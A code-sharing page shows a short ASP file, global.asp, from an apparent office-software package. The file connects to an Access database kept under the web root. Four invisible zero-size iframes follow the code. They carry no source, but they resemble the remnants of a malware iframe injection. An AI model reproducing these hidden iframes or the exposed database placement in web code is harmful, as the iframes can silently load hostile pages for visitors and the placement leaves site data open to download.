global.asp
来自「一套asp办公小软件」· ASP 代码 · 共 15 行
ASP
15 行
<%
'==== 数据库连接参数=====================================================
sjlj=Server.MapPath("/lvyou.mdb")
dim conn
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & sjlj &";"
' response.write(sjlj)
%>
<iframe width=0 height=0></iframe>
<iframe width=0 height=0></iframe>
<iframe width=0 height=0></iframe>
<iframe width=0 height=0></iframe>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?